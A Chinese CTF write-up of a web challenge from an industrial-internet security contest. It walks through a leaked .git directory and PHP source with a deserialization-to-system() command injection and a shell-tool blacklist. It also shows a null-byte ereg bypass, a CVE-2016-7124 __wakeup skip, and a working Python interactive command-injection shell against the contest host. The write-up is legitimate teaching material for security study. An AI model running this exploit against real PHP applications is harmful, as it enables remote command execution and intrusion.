赛博地球杯工业互联网安全大赛web题--工控系统的敏感消息遭泄漏

前言

web题大致看了一下，都没啥思路。。。。。麻蛋签到题也不会，但是这道题我是有思路的，套路跟以前做过的ctf题目类似，算是中规中矩的题目了。

分析

题目内容：

云平台消息中心，泄漏了不该泄漏的消息。导致系统可以被入侵。

既然是信息泄露，首先想到的是源码泄露。试了一下，发现是git目录泄露，那么利用工具直接把git目录下载下来（工具网上有但我是自己写的，有时间写一篇博客记录下）。
然后恢复所有删除的文件即可，使用如下命令：

git ls-files -d | xargs git checkout --

之后只用关注class.php，index2.php，waf.php这三个文件即可。

//file: class.php
<?php
error_reporting(0);

class Record{
    public $file="Welcome";

    public function __construct($file)
    {
        $this->file = $file;
    }


    public function __wakeup()
    {
        $this->file = 'wakeup.txt';
    }

    public function __destruct()
    {
        if ($this->file != 'wakeup.txt' && $this->file != 'sleep.txt' && $this->file != 'Welcome') {
        	system("php ./import/$this->file.php");
        }else{
        	echo "<?php Something destroyed ?>";
        }
    }


}

$b =new Record('Welcome');
unset($b);

?>

//file: index2.php
<!DOCTYPE HTML>
<html>
<head>
	<meta charset="utf-8">
  	<meta name="renderer" content="webkit">
  	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  	<link rel="stylesheet" href="layui/css/layui.css"  media="all">
	<title>消息中心</title>
	<meta charset="utf-8">
</head>
<body>
<ul class="layui-nav">
        <li class="layui-nav-item layui-this"><a href="?page=index">云平台消息中心</a></li>
    </ul>
<fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
  <legend>系统消息</legend>
</fieldset>
<ul class="layui-timeline">
  <li class="layui-timeline-item">
    <i class="layui-icon layui-timeline-axis"></i>
    <div class="layui-timeline-content layui-text">
      <h3 class="layui-timeline-title">2018年1月</h3>
      <p></p>
      <ul>
        <li><a href="?file=Welcome">云平台会员独享，云防护加固，每月仅需xxx</a></li>
        <li><a href="?file=Me"  >云平台会员抽奖开始啦</a></li>
      </ul>
    </div>
  </li>
  <li class="layui-timeline-item">
    <i class="layui-icon layui-timeline-axis"></i>
    <div class="layui-timeline-content layui-text">
      <h3 class="layui-timeline-title">2017年12月</h3>
      <p></p>
      <ul>
        <li><a href="?file=Record" >5分钟快速了解本系统</a></li>
        <li><a href="?file=Flag&secret=yes"   >欢迎使用xx云工控管理系统</a></li>
      </ul>
    </div>
  </li>
</ul>

<?php
error_reporting(0);

include 'class.php';
include 'waf.php';
if(@$_GET['file']){
	$file = $_GET['file'];
	waf($file);
}else{
	$file = "Welcome";
}

if($_GET['id'] === '1'){
	include 'welcome/nothing.php';
	die();
}
$secret = $_GET['secret'];
$ad  = $_GET['ad'];

if(isset($ad)){
    if(ereg("^[a-zA-Z0-9]+$", $ad) === FALSE)
    {
        echo '<script>alert("Sorry ! Again !")</script>';
    }
    elseif(strpos($ad, '--') !== FALSE)
    {
				echo "Ok Evrything will be fine!<br ><br >";
				if (stripos($secret, './') > 0) {
					die();
				}
        unserialize($secret);
    }
    else
    {
        echo '<script>alert("Sorry ! You must have --")</script>';
    }
 }


?>

<?php

if($file == "Welcome"){
	require_once 'welcome/welcome.php';
}else{
	if(!file_exists("./import/$file.php")){
		die("The file does not exit !");
	}elseif(!system("php ./import/$file.php")){
		die('Something was wrong ! But it is ok! ignore it :)');

	}
}
?>
</div>
<script>
    layui.use('element', function() {
        var element = layui.element; //导航的hover效果、二级菜单等功能，需要依赖element模块
        //监听导航点击
        element.on('nav(demo)', function(elem) {
            //console.log(elem)
            layer.msg(elem.text());
        });
    });
    </script>
</body>
</html>

//file: waf.php
<?php
error_reporting(0);

function waf($values){
	//$black = [];
	$black = array('vi','awk','-','sed','comm','diff','grep','cp','mv','nl','less','od','cat','head','tail','more','tac','rm','ls','tailf',' ','%','%0a','%0d','%00','ls','echo','ps','>','<','${IFS}','ifconfig','mkdir','cp','chmod','wget','curl','http','www','`','printf');

	foreach ($black as $key => $value) {
		if(stripos($values,$value)){
			die("Attack!");
		}
		if (!ctype_alnum($values)) {
			die("Attack!");
		}
	}
}

?>

三个文件的逻辑很简单，其中index2.php中有主逻辑，下面一个个分析。

• waf.php
  这个文件只有一个函数waf()，这个函数对传入字符串进行黑名单排查。
• class.php
  该文件中建立了一个Record的类，该类有一个属性file，有__sleep(),__wakeup两个特殊的魔术方法定义，感觉这就是解题关键。
• index2.php
  该文件有题目的主逻辑，只要突破对$ad变量的重重阻碍，就可到达一个解序列化函数unserialize($secret)，而这就是解题关键。

解决

通读三个文件，有两处调用了system函数，其中index2.php中在调用前会检查文件是否存在，只有Record类的__destruct函数中调用时并未做检查。这里如果控制file属性，就可以控制system函数的参数，从而造成命令注入。
这里需要解决三大问题：

• ereg和strpos函数矛盾
  这里可以利用ereg函数的截断漏洞绕过，该函数会在ascii码为0的地方截断。
• secret中不能包含./
  这个不是问题，但是要注意，嘿嘿。
• 解序列化后如何进入system的条件语句块
  这里要利用php的一个漏洞（CVE-2016-7124），php（PHP5< 5.6.25；PHP7< 7.0.10）在使用函数unserialize时，若属性个数大于实际属性个数就不会调用类的__wakeup函数。在这里就能控制file属性的值了。
  于是为了更容易的执行命令，我用python写了如下的代码

  import requests
  def work():
      secret = 'O:6:"Record":3:{s:4:"file";s:%d:"%s";}'
      ad = '1\x00--'
      file ='Flag'
      url = "http://47.104.99.231:20003/index2.php"
      
      while(True):
          cmd = raw_input('$ ')
          if(cmd == 'quit'):
              print 'over!!!'
              break
          cmd = 'Flag.php && ({}) && echo '.format(cmd)
          s = secret%(len(cmd),cmd)
          r = requests.get(url,params={'file':file,'ad':ad,'secret':s})
          r.encoding = 'utf-8'
          i = r.text.find('Flag is !')+9
          j = r.text.rfind('Flag is !')-6
          print r.text[i:j].encode('GB18030')
          r.close()
  work()

最后flag在Flag.php文件中：

$ ls import
Flag.php
Me.php
Record.php

$ cat import/Flag.php
<?php
error_reporting(0);
//$flag = "flag{g_i_i_t_is_unsafe_ahhhahahah}";

echo "Flag is !";
?>

$

总结

这道题考察了多处php的一些漏洞，但在ctf中属于常规题目，没有过多的脑洞还是挺适合我的，嘿嘿。。但我还是很菜，因为这道题做出来的人很多！！以后要继续向大佬学习。